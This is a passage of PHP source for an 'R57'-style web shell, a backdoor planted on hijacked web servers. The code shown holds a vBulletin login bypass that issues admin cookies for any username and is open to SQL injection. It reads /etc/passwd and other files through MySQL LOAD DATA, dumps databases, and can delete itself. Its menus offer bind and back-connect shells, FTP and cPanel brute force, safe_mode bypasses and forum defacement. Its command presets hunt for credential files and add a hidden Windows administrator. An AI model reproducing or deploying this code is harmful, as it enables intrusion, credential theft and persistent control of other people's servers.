656 echo '<font color=red>failed to inject '.$injectj00.'</font>';
657 }
658 }
659 } else {
660 echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
661 }
662}
663?>
664</body></html>
665<?
666}
667if($_GET['act']=="fakelogin"){
668echo '<form name=form method=POST><b>Username : </b><input name="user" size="45" value="" type="text"><br/>Path global.php : </b><input name="global" size="45" value="./global.php" type="text"><br/>
669<b>Path functions_login.php : </b><input name="login" size="45" value="./includes/functions_login.php" type="text"><br/><input name="submit" size="2" value="Login" type="submit"></form>';
670if ($_POST['submit']){
671define('THIS_SCRIPT', 'login');
672echo $_POST['global'];
673require_once($_POST['global']);
674require_once($_POST['login']);
675$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_POST['user'] . "'");
676if (!$vbulletin->userinfo['userid']) echo "Invalid username!";
677else
678{
679echo $_POST['login'];
680vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
681vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
682exec_unstrike_user($_POST['user']);
683process_new_login('cplogin', TRUE, TRUE);
684do_login_redirect();
685}}}
686echo "</table><br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div></body></html>";
687exit();
688}
689//Tools Hacking End
690
691$language='eng';
692$auth = 0;
693error_reporting(E_ALL);
694$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
695$downloaders = array('wget','fetch','lynx','links','curl','get');
696set_magic_quotes_runtime(0);
697@set_time_limit(0);
698@ini_set('max_execution_time',0);
699@ini_set('output_buffering',0);
700define("starttime",getmicrotime());
701$safe_mode = @ini_get('safe_mode');
702$version = 'TheSunOfVN Edition';
703$footer = '<div align=center><font face=Verdana size=-2><b>o---[ Khari Walkaz R57 Shell ]---o</b></font></div>';
704if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
705if(@function_exists('ini_set'))
706 {
707 @ini_set('max_execution_time',0);
708 @ini_set('output_buffering',0);
709 }
710else
711 {
712 @ini_alter('max_execution_time',0);
713 @ini_alter('output_buffering',0);
714 }
715if(version_compare(phpversion(), '4.1.0') == -1)
716 {
717 $_POST = &$HTTP_POST_VARS;
718 $_GET = &$HTTP_GET_VARS;
719 $_SERVER = &$HTTP_SERVER_VARS;
720 $_COOKIE = &$HTTP_COOKIE_VARS;
721 }
722if (@get_magic_quotes_gpc())
723 {
724 foreach ($_POST as $k=>$v)
725 {
726 $_POST[$k] = stripslashes($v);
727 }
728 foreach ($_COOKIE as $k=>$v)
729 {
730 $_COOKIE[$k] = stripslashes($v);
731 }
732 }
733function compress(&$filename,&$filedump,$compress)
734 {
735 global $content_encoding;
736 global $mime_type;
737 if ($compress == 'bzip' && @function_exists('bzcompress'))
738 {
739 $filename .= '.bz2';
740 $mime_type = 'application/x-bzip2';
741 $filedump = bzcompress($filedump);
742 }
743 else if ($compress == 'gzip' && @function_exists('gzencode'))
744 {
745 $filename .= '.gz';
746 $content_encoding = 'x-gzip';
747 $mime_type = 'application/x-gzip';
748 $filedump = gzencode($filedump);
749 }
750 else if ($compress == 'zip' && @function_exists('gzcompress'))
751 {
752 $filename .= '.zip';
753 $mime_type = 'application/zip';
754 $zipfile = new zipfile();
755 $zipfile -> addFile($filedump, substr($filename, 0, -4));
756 $filedump = $zipfile -> file();
757 }
758 else
759 {
760 $mime_type = 'application/octet-stream';
761 }
762 }
763class my_sql
764 {
765 var $host = 'localhost';
766 var $port = '';
767 var $user = '';
768 var $pass = '';
769 var $base = '';
770 var $db = '';
771 var $connection;
772 var $res;
773 var $error;
774 var $rows;
775 var $columns;
776 var $num_rows;
777 var $num_fields;
778 var $dump;
779function connect()
780 {
781 switch($this->db)
782 {
783 case 'MySQL':
784 if(empty($this->port)) { $this->port = '3306'; }
785 if(!function_exists('mysql_connect')) return 0;
786 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
787 if(is_resource($this->connection)) return 1;
788 break;
789 case 'MSSQL':
790 if(empty($this->port)) { $this->port = '1433'; }
791 if(!function_exists('mssql_connect')) return 0;
792 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
793 if($this->connection) return 1;
794 break;
795 case 'PostgreSQL':
796 if(empty($this->port)) { $this->port = '5432'; }
797 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
798 if(!function_exists('pg_connect')) return 0;
799 $this->connection = @pg_connect($str);
800 if(is_resource($this->connection)) return 1;
801 break;
802 case 'Oracle':
803 if(!function_exists('ocilogon')) return 0;
804 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
805 if(is_resource($this->connection)) return 1;
806 break;
807 }
808 return 0;
809 }
810
811 function select_db()
812 {
813 switch($this->db)
814 {
815 case 'MySQL':
816 if(@mysql_select_db($this->base,$this->connection)) return 1;
817 break;
818 case 'MSSQL':
819 if(@mssql_select_db($this->base,$this->connection)) return 1;
820 break;
821 case 'PostgreSQL':
822 return 1;
823 break;
824 case 'Oracle':
825 return 1;
826 break;
827 }
828 return 0;
829 }
830
831 function query($query)
832 {
833 $this->res=$this->error='';
834 switch($this->db)
835 {
836 case 'MySQL':
837 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
838 {
839 $this->error = @mysql_error($this->connection);
840 return 0;
841 }
842 else if(is_resource($this->res)) { return 1; }
843 return 2;
844 break;
845 case 'MSSQL':
846 if(false===($this->res=@mssql_query($query,$this->connection)))
847 {
848 $this->error = 'Query error';
849 return 0;
850 }
851 else if(@mssql_num_rows($this->res) > 0) { return 1; }
852 return 2;
853 break;
854 case 'PostgreSQL':
855 if(false===($this->res=@pg_query($this->connection,$query)))
856 {
857 $this->error = @pg_last_error($this->connection);
858 return 0;
859 }
860 else if(@pg_num_rows($this->res) > 0) { return 1; }
861 return 2;
862 break;
863 case 'Oracle':
864 if(false===($this->res=@ociparse($this->connection,$query)))
865 {
866 $this->error = 'Query parse error';
867 }
868 else
869 {
870 if(@ociexecute($this->res))
871 {
872 if(@ocirowcount($this->res) != 0) return 2;
873 return 1;
874 }
875 $error = @ocierror();
876 $this->error=$error['message'];
877 }
878 break;
879 }
880 return 0;
881 }
882 function get_result()
883 {
884 $this->rows=array();
885 $this->columns=array();
886 $this->num_rows=$this->num_fields=0;
887 switch($this->db)
888 {
889 case 'MySQL':
890 $this->num_rows=@mysql_num_rows($this->res);
891 $this->num_fields=@mysql_num_fields($this->res);
892 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
893 @mysql_free_result($this->res);
894 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
895 break;
896 case 'MSSQL':
897 $this->num_rows=@mssql_num_rows($this->res);
898 $this->num_fields=@mssql_num_fields($this->res);
899 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
900 @mssql_free_result($this->res);
901 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
902 break;
903 case 'PostgreSQL':
904 $this->num_rows=@pg_num_rows($this->res);
905 $this->num_fields=@pg_num_fields($this->res);
906 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
907 @pg_free_result($this->res);
908 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
909 break;
910 case 'Oracle':
911 $this->num_fields=@ocinumcols($this->res);
912 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
913 @ocifreestatement($this->res);
914 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
915 break;
916 }
917 return 0;
918 }
919 function dump($table)
920 {
921 if(empty($table)) return 0;
922 $this->dump=array();
923 $this->dump[0] = '##';
924 $this->dump[1] = '## --------------------------------------- ';
925 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
926 $this->dump[3] = '## Database: '.$this->base;
927 $this->dump[4] = '## Table: '.$table;
928 $this->dump[5] = '## --------------------------------------- ';
929 switch($this->db)
930 {
931 case 'MySQL':
932 $this->dump[0] = '## MySQL dump';
933 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
934 if(!$this->get_result()) return 0;
935 $this->dump[] = $this->rows[0]['Create Table'];
936 $this->dump[] = '## --------------------------------------- ';
937 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
938 if(!$this->get_result()) return 0;
939 for($i=0;$i<$this->num_rows;$i++)
940 {
941 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
942 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
943 }
944 break;
945 case 'MSSQL':
946 $this->dump[0] = '## MSSQL dump';
947 if($this->query('SELECT * FROM '.$table)!=1) return 0;
948 if(!$this->get_result()) return 0;
949 for($i=0;$i<$this->num_rows;$i++)
950 {
951 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
952 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
953 }
954 break;
955 case 'PostgreSQL':
956 $this->dump[0] = '## PostgreSQL dump';
957 if($this->query('SELECT * FROM '.$table)!=1) return 0;
958 if(!$this->get_result()) return 0;
959 for($i=0;$i<$this->num_rows;$i++)
960 {
961 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
962 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
963 }
964 break;
965 case 'Oracle':
966 $this->dump[0] = '## ORACLE dump';
967 $this->dump[] = '## under construction';
968 break;
969 default:
970 return 0;
971 break;
972 }
973 return 1;
974 }
975 function close()
976 {
977 switch($this->db)
978 {
979 case 'MySQL':
980 @mysql_close($this->connection);
981 break;
982 case 'MSSQL':
983 @mssql_close($this->connection);
984 break;
985 case 'PostgreSQL':
986 @pg_close($this->connection);
987 break;
988 case 'Oracle':
989 @oci_close($this->connection);
990 break;
991 }
992 }
993 function affected_rows()
994 {
995 switch($this->db)
996 {
997 case 'MySQL':
998 return @mysql_affected_rows($this->res);
999 break;
1000 case 'MSSQL':
1001 return @mssql_affected_rows($this->res);
1002 break;
1003 case 'PostgreSQL':
1004 return @pg_affected_rows($this->res);
1005 break;
1006 case 'Oracle':
1007 return @ocirowcount($this->res);
1008 break;
1009 default:
1010 return 0;
1011 break;
1012 }
1013 }
1014 }
1015if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
1016 {
1017 if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
1018 else
1019 {
1020 @ob_clean();
1021 $filename = @basename($_POST['d_name']);
1022 $filedump = @fread($file,@filesize($_POST['d_name']));
1023 fclose($file);
1024 $content_encoding=$mime_type='';
1025 compress($filename,$filedump,$_POST['compress']);
1026 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
1027 header("Content-type: ".$mime_type);
1028 header("Content-disposition: attachment; filename=\"".$filename."\";");
1029 echo $filedump;
1030 exit();
1031 }
1032 }
1033if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
1034
1035
1036if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
1037 {
1038 echo $head;
1039 $sql = new my_sql();
1040 $sql->db = $_POST['db'];
1041 $sql->host = $_POST['db_server'];
1042 $sql->port = $_POST['db_port'];
1043 $sql->user = $_POST['mysql_l'];
1044 $sql->pass = $_POST['mysql_p'];
1045 $sql->base = $_POST['mysql_db'];
1046 $querys = @explode(';',$_POST['db_query']);
1047 echo '<body bgcolor=Black>';
1048 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=#2aff00><b>Can't connect to SQL server</b></font></div>";
1049 else
1050 {
1051 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=#2aff00><b>Can't select database</b></font></div>";
1052 else
1053 {
1054 foreach($querys as $num=>$query)
1055 {
1056 if(strlen($query)>5)
1057 {
1058 echo "<font face=Verdana size=-2 color=#2aff00><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
1059 switch($sql->query($query))
1060 {
1061 case '0':
1062 echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1063 break;
1064 case '1':
1065 if($sql->get_result())
1066 {
1067 echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
1068 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1069 $keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
1070 echo "<tr><td class=main bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
1071 for($i=0;$i<$sql->num_rows;$i++)
1072 {
1073 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1074 $values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
1075 echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
1076 }
1077 echo "</table>";
1078 }
1079 break;
1080 case '2':
1081 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1082 echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1083 break;
1084 }
1085 }
1086 }
1087 }
1088 echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
1089 echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
1090 echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
1091 $query_db = mysql_query("SHOW DATABASES;");
1092 while ($query_db_row = mysql_fetch_array($query_db))
1093 {
1094 echo $query_db_row[0]."\n";
1095 }
1096 echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
1097 if (($_POST['mysql_db']) && $sql->select_db())
1098 {
1099 $query_tables = mysql_query("SHOW TABLES;");
1100 while ($query_tables_row = mysql_fetch_array($query_tables))
1101 {
1102 echo $query_tables_row[0]."\n";
1103 }
1104 }
1105 echo "</textarea></div></td></tr></table></div>";
1106 }
1107 echo "<br><form name=form method=POST>";
1108 echo in('hidden','db',0,$_POST['db']);
1109 echo in('hidden','db_server',0,$_POST['db_server']);
1110 echo in('hidden','db_port',0,$_POST['db_port']);
1111 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1112 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1113 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1114 echo in('hidden','cmd',0,'db_query');
1115 echo "<div align=center>";
1116 echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1117 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1118 echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \"><br /><br />";
1119 echo "<b>File content</b><br><br>";
1120 echo "<textarea cols=121 rows=15 name=showloadfile>";
1121 @mysql_query("DROP TABLE IF EXISTS thesunofvn");
1122 @mysql_query("CREATE TABLE `thesunofvn` ( `file` LONGBLOB NOT NULL )");
1123 @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE thesunofvn FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
1124 $r = @mysql_query("SELECT * FROM thesunofvn");
1125 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
1126 @mysql_query("DROP TABLE IF EXISTS thesunofvn");
1127 echo "</textarea></div>";
1128 echo "</form>";
1129 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1130 }
1131if(isset($_GET['delete']))
1132 {
1133 @unlink(__FILE__);
1134 }
1135if(isset($_GET['tmp']))
1136 {
1137 @unlink("/tmp/bdpl");
1138 @unlink("/tmp/back");
1139 @unlink("/tmp/bd");
1140 @unlink("/tmp/bd.c");
1141 @unlink("/tmp/dp");
1142 @unlink("/tmp/dpc");
1143 @unlink("/tmp/dpc.c");
1144 }
1145if(isset($_GET['phpini']))
1146{
1147echo $head;
1148function U_value($value)
1149 {
1150 if ($value == '') return '<i>no value</i>';
1151 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
1152 if ($value === null) return 'NULL';
1153 if (@is_object($value)) $value = (array) $value;
1154 if (@is_array($value))
1155 {
1156 @ob_start();
1157 print_r($value);
1158 $value = @ob_get_contents();
1159 @ob_end_clean();
1160 }
1161 return U_wordwrap((string) $value);
1162 }
1163function U_wordwrap($str)
1164 {
1165 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
1166 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
1167 }
1168if (@function_exists('ini_get_all'))
1169 {
1170 $r = '';
1171 echo '<table width=100%>', '<tr><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#2aff00><div align=center><b>Master Value</b></div></font></td></tr>';
1172 foreach (@ini_get_all() as $key=>$value)
1173 {
1174 $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1175 }
1176 echo $r;
1177 echo '</table>';
1178 }
1179echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1180die();
1181}
1182if(isset($_GET['cpu']))
1183 {
1184 echo $head;
1185 echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#2aff00><b>CPU</b></font></div></td></tr></table><table width=100%>';
1186 $cpuf = @file("cpuinfo");
1187 if($cpuf)
1188 {
1189 $c = @sizeof($cpuf);
1190 for($i=0;$i<$c;$i++)
1191 {
1192 $info = @explode(":",$cpuf[$i]);
1193 if($info[1]==""){ $info[1]="---"; }
1194 $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1195 }
1196 echo $r;
1197 }
1198 else
1199 {
1200 echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1201 }
1202 echo '</table>';
1203 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1204 die();
1205 }
1206if(isset($_GET['mem']))
1207 {
1208 echo $head;
1209 echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#2aff00><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1210 $memf = @file("meminfo");
1211 if($memf)
1212 {
1213 $c = sizeof($memf);
1214 for($i=0;$i<$c;$i++)
1215 {
1216 $info = explode(":",$memf[$i]);
1217 if($info[1]==""){ $info[1]="---"; }
1218 $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1219 }
1220 echo $r;
1221 }
1222 else
1223 {
1224 echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1225 }
1226 echo '</table>';
1227 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1228 die();
1229 }
1230$lang=array(
1231/* --------------------------------------------------------------- */
1232'eng_text1' =>'Executed command',
1233'eng_text2' =>'Execute command on server',
1234'eng_text3' =>'Run command',
1235'eng_text4' =>'Work directory',
1236'eng_text5' =>'Upload files on server',
1237'eng_text6' =>'Local file',
1238'eng_text7' =>'Aliases',
1239'eng_text8' =>'Select alias',
1240'eng_butt1' =>'Execute',
1241'eng_butt2' =>'Upload',
1242'eng_text9' =>'Bind port to /bin/bash',
1243'eng_text10'=>'Port',
1244'eng_text11'=>'Password for access',
1245'eng_butt3' =>'Bind',
1246'eng_text12'=>'back-connect',
1247'eng_text13'=>'IP',
1248'eng_text14'=>'Port',
1249'eng_butt4' =>'Connect',
1250'eng_text15'=>'Upload files from remote server',
1251'eng_text16'=>'With',
1252'eng_text17'=>'Remote file',
1253'eng_text18'=>'Local file',
1254'eng_text20'=>'Use',
1255'eng_text21'=>' New name',
1256'eng_text23'=>'Local port',
1257'eng_text24'=>'Remote host',
1258'eng_text25'=>'Remote port',
1259'eng_text26'=>'Use',
1260'eng_butt5' =>'Run',
1261'eng_text28'=>'Work in safe_mode',
1262'eng_text29'=>'...::: ACCESS DENIED :::...',
1263'eng_butt6' =>'Change',
1264'eng_text30'=>'Cat file',
1265'eng_butt7' =>'Show',
1266'eng_text31'=>'File not found',
1267'eng_text32'=>'Eval PHP code',
1268'eng_text33'=>'Test bypass open_basedir with cURL functions',
1269'eng_text300'=>'read file from vul curl()',
1270'eng_butt8' =>'Test',
1271'eng_text34'=>'',
1272'eng_text35'=>'Test bypass with load file in mysql',
1273'eng_text36'=>'Db . Table',
1274'eng_text37'=>'Login',
1275'eng_text38'=>'Password',
1276'eng_text39'=>'Database',
1277'eng_text40'=>'Dump database table',
1278'eng_butt9' =>'Dump',
1279'eng_text41'=>'Save dump in file',
1280'eng_text42'=>'Edit files',
1281'eng_text43'=>'File for edit',
1282'eng_butt10'=>'Save',
1283'eng_text44'=>'Can\'t edit file! Only read access!',
1284'eng_text45'=>'File saved',
1285'eng_text46'=>'Show phpinfo()',
1286'eng_text47'=>'Show variables from php.ini',
1287'eng_text48'=>'Delete temp files',
1288'eng_butt11'=>'Edit file',
1289'eng_text49'=>'Delete script from server',
1290'eng_text50'=>'View cpu info',
1291'eng_text51'=>'View memory info',
1292'eng_text52'=>'Find text',
1293'eng_text53'=>'In dirs',
1294'eng_text54'=>'Find text in files',
1295'eng_butt12'=>'Find',
1296'eng_text55'=>'Only in files',
1297'eng_text56'=>'Nothing :(',
1298'eng_text57'=>'Create/Delete File/Dir',
1299'eng_text58'=>'name',
1300'eng_text59'=>'file',
1301'eng_text60'=>'dir',
1302'eng_butt13'=>'Create/Delete',
1303'eng_text61'=>'File created',
1304'eng_text62'=>'Dir created',
1305'eng_text63'=>'File deleted',
1306'eng_text64'=>'Dir deleted',
1307'eng_text65'=>'Create',
1308'eng_text66'=>'Delete',
1309'eng_text67'=>'Chown/Chgrp/Chmod',
1310'eng_text68'=>'Command',
1311'eng_text69'=>'param1',
1312'eng_text70'=>'param2',
1313'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1314'eng_text72'=>'Text for find',
1315'eng_text73'=>'Find in folder',
1316'eng_text74'=>'Find in files',
1317'eng_text75'=>'* you can use regexp',
1318'eng_text76'=>'',
1319'eng_text80'=>'Type',
1320'eng_text81'=>'Net',
1321'eng_text82'=>'Databases',
1322'eng_text83'=>'Run SQL query',
1323'eng_text84'=>'SQL query',
1324'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1325'eng_text86'=>'Download files from server',
1326'eng_butt14'=>'Download',
1327'eng_text87'=>'Download files from remote ftp-server',
1328'eng_text88'=>'FTP-server:port',
1329'eng_text89'=>'File on ftp',
1330'eng_text90'=>'Transfer mode',
1331'eng_text91'=>'Archivation',
1332'eng_text92'=>'without archivation',
1333'eng_text93'=>'FTP',
1334'eng_text94'=>'FTP-bruteforce',
1335'eng_text95'=>'Users list',
1336'eng_text96'=>'Can\'t get users list',
1337'eng_text97'=>'checked: ',
1338'eng_text98'=>'success: ',
1339'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1340'eng_text100'=>'Send file to remote ftp server',
1341'eng_text101'=>'Use reverse (user -> resu) login for password',
1342'eng_text109'=>'Hide',
1343'eng_text110'=>'Show',
1344'eng_text111'=>'SQL-Server : Port',
1345
1346'eng_text115'=>'',
1347'eng_text116'=>'Copy from',
1348'eng_text117'=>'to',
1349'eng_text118'=>'File copied',
1350'eng_text119'=>'Cant copy file',
1351'eng_text120'=>'SQL-Server',
1352'eng_text121'=>'Vbulletin Deface',
1353'eng_text122'=>'ln -s',
1354'eng_text123'=>'Brute Cpanel Account',
1355'eng_text124'=>'About me',
1356'eng_text125'=>'Bypass php 5.2.6',
1357'eng_text127'=>'Bypass php 5.2.9',
1358'eng_text128'=>'Destroy file....',
1359'eng_text129'=>'Useful',
1360'eng_text130'=>'Downloaders',
1361'eng_text131'=>'PHP Bypass',
1362'eng_err0'=>'Error! Can\'t write in file ',
1363'eng_err1'=>'Error! Can\'t read file ',
1364'eng_err2'=>'Error! Can\'t create ',
1365'eng_err5'=>'Error! Can\'t change dir on ftp',
1366'eng_text200'=>'read file from vul copy()',
1367'eng_text202'=>'where file in server',
1368'eng_text203'=>'read file from vul ini_restore()',
1369'eng_text204'=>'Show list users',
1370'eng_text205'=>'write shell in this side',
1371'eng_text206'=>'read dir',
1372'eng_text207'=>'read dir from vul reg_glob',
1373'eng_text209'=>'read dir from vul root',
1374'eng_text210'=>'DeZender ',
1375'eng_text211'=>'safe_mode off',
1376'eng_text212'=>'Close safe_mode with php.ini',
1377'eng_text213'=>'Close security_mod with .htaccess',
1378'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
1379'eng_text219'=>'Get file to server in safe_mode and change name',
1380'eng_text223'=>'read file from funcution',
1381'eng_text224'=>'read file from PLUGIN',
1382'eng_text226' => 'Write to file',
1383'eng_text230' => 'ionCube extension safe_mode bypass',
1384'eng_text231' => 'win32std extension safe_mode bypass',
1385'eng_text232' => 'win32service extension safe_mode bypass',
1386'eng_text233' => 'perl extension safe_mode bypass',
1387'eng_text234' => 'FFI extension safe_mode bypass',
1388'eng_butt65'=>'Write',
1389);
1390
1391$aliases=array(
1392'________________for server unix ______________-'=>'dir -ao',
1393'find config* files'=>'find / -type f -name "config*"',
1394'find config* files in current dir'=>'find . -type f -name "config*"',
1395'find all writable files'=>'find / -type f -perm -2 -ls',
1396'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
1397'find all writable directories'=>'find / -type d -perm -2 -ls',
1398'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
1399'find all writable directories and files'=>'find / -perm -2 -ls',
1400'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
1401'find all service.pwd files'=>'find / -type f -name service.pwd',
1402'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
1403'find all .bash_history files'=>'find / -type f -name .bash_history',
1404'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
1405'find all .mysql_history files'=>'find / -type f -name .mysql_history',
1406'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
1407'show opened ports'=>'netstat -an | grep -i listen',
1408'________________for server windows ______________-'=>'dir',
1409'1_add new user'=>'net user thesunofvn 123123 /add',
1410'2_add your user for admin group'=>'net localgroup administrators thesunofvn /add',
1411'3_add your user for Remote Desktop group'=>'net localgroup "Remote Desktop Users" thesunofvn /add',
1412'----------------------------------------------------------------------------------------------------'=>'ls -la'
1413);
1414$table_up1 = "<tr><td class=main bgcolor=Black
1415><font face=Verdana size=-2><b><div class=tt align=center>:: ";
1416$table_up2 = " ::</div></b></font></td></tr><tr><td class=main>";
1417$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main>";
1418$table_end1 = "</td></tr>";
1419$arrow = " <font face=Webdings color=#2aff00>4</font>";
1420$lb = "<font color=#2aff00>[</font>";
1421$rb = "<font color=#2aff00>]</font>";
1422$font = "<font face=Verdana size=-2>";
1423$ts = "<table class=table1 width=100% align=center>";
1424$te = "</table>";
1425$fs = "<form name=form method=POST>";
1426$fe = "</form>";
1427
1428if(isset($_GET['users']))
1429 {
1430 echo $head;
1431 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=#2aff00>".$lang[$language.'_text96']."</font></center>"; }
1432 else
1433 {
1434 echo '<center><textarea cols=20 rows=20>';
1435 foreach($users as $user) { echo $user."\n"; }
1436 echo '</textarea></center>';
1437 }
